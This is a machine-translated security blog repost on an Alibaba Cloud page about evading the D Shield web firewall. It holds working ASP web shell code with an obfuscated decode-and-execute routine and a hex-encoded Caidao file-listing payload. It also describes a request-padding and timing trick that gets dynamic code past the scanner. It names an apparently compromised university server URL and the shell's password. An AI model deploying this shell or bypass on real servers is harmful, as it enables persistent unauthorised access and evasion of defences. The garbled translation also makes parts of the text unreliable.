D. Shield bypasses a wonderful line of dynamic code

Source: Internet
Author: User

D. Shield bypasses a wonderful line of dynamic code

D shield blocked the execution of the input dynamic script, but we can bypass it in a strange way.

One sentence address: http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp password: z ordinary kitchen knife is not connected to the drop.

The Code is as follows:
 

<%
Function decode(ByVal s, ByVal key) For i = 1 To Len(s) Step 2 c = Mid(s, i, 2) k = (i + 1) / 2 Mod Len(key) + 1 p = Mid(key, k, 1) If IsNumeric(Mid(s, i, 1)) Then decode = decode & Chr(("&H" & c) - p) Else decode = decode & Chr("&H" & c & Mid(s, i + 2, 2)) i = i + 2 End If NextEnd FunctionExecute decode("4A7A6C6C7A766C3169676A7869672F7B6A737C6E78762F2B7F2430357767787E6A757B31276D6C82272B3032","9527")%>





That is, the input parameter z is decoded by the decode function and executed.

Encode Response. Write (2333333 + 1) and run the code (526573706F6E73652E577269746528323333333333332B3129 ).
 



However, when we encoded the data packet of the kitchen knife, the code was intercepted relentlessly:

Code Before encoding:
 

Response.Write("->|"):Dim RR:RR=decode(Request("k1"),Request("key")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name:Next:For Each L in FO.files:Response.Write L.Name:Next:End If:Response.Write("|<-"):Response.End



After encoding:
 

526573706F6E73652E577269746528222D3E7C22293A44696D2052523A52523D6465636F6465285265717565737428226B3122292C5265717565737428226B65792229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D61744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E577269746520462E4E616D653A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D653A4E6578743A456E642049663A526573706F6E73652E577269746528227C3C2D22293A526573706F6E73652E456E64


 





There are no keywords in the data packet. Obviously, the interception of D shield is not during transmission. D shield can detect calls to some sensitive methods by the code During code decoding and execution, such as FSO.

However, when I do not execute code dynamically (written to the Web directory of the server), the results can be obtained successfully.
 





After combing the entire process, we can conclude that D shield checks the final content of the dynamic code (no matter how users [encrypt]), however, we can also conclude that such detection will consume a certain amount of system resources. So how can we minimize resource consumption? The final test showed that D shield detected every request of the user, but at the same time, it terminated the check on all previous requests when detecting subsequent requests.



Therefore, a bypass solution was born. We constructed enough dynamic code for the first request package to take some time for detection. Make sure that the dynamic code in the first request has not been detected, and then send the second request (the second request does not contain any URL of the dynamic code GET website ), then the check for the first request will be completed in the future. (Note: I add a lot of 0A [line feed] Before dynamic code to consume the detection time)



First request:

Http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp

POST
 

Z = 0A0A... omitted many 0A0A... Values & key = 00000 & k1 = values





Second request: Direct GET request http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp

Direct POST sending is intercepted:
 





According to the above method, the dynamic code is successfully executed:
 


 

 


 

 

Solution:

Logic

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.